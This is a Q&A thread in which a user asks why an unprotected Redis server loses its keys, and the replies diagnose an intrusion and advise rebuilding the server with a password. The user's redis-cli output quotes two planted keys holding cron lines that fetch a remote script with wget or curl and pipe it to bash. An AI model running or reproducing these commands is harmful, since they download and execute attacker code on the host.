# My redis server loses keys every few minutes

Tags: redis, key

My redis server loses keys every few minutes.
This is so wired and i cannot find the reason of this problem.
I was trying to keep my keys with expireat option, but expire and expireat options are ignored after few minutes, all keys are gone and two wired keys are added, "weaponsZ" , "weaponsX".
I don't know how that wired keys are existed in my redis.

Please help, I think that I am gonna crazy.

This is my environment. [OS : Ubuntu 16.04.5 64bit, Redis : 4.0.10, GPU : Nvidia 1080 Ti, Tensorflow 1.0, CUDA 8]

- 127.0.0.1:6379> set 'a' 1
- OK
- 127.0.0.1:6379> expireat 'a' 1637309179
- (integer) 1
- $ redis-cli info
- ...
- db0:keys=1,expires=1,avg_ttl=99994268099
- (after few minutes)
- $ redis-cli
- 127.0.0.1:6379> KEYS *
- 1) "weaponZ"
- 2) "weaponX"
- 127.0.0.1:6379> get "weaponZ"
- "\n*/7 * * * * wget -q -O- https://pixeldra.in/api/download/m5YEMO --no-check-certificate | bash\n"
- 127.0.0.1:6379> get "weaponX"
- "\n*/5 * * * * curl -fsSLk https://pixeldra.in/api/download/m5YEMO | bash\n"

Comment: I also have the same problem. Do you have any solution?

Comment: Probably your server was infected by someone. Read this for more info https://www.imperva.com/blog/new-research-shows-75-of-open-redis-servers-infected/

Answer (score 3):

Your server is being accessed by a nefarious party in an attempt to gain access to its resources. You should burn the server, and set a new one up **with a password** if it is connected to the outside world.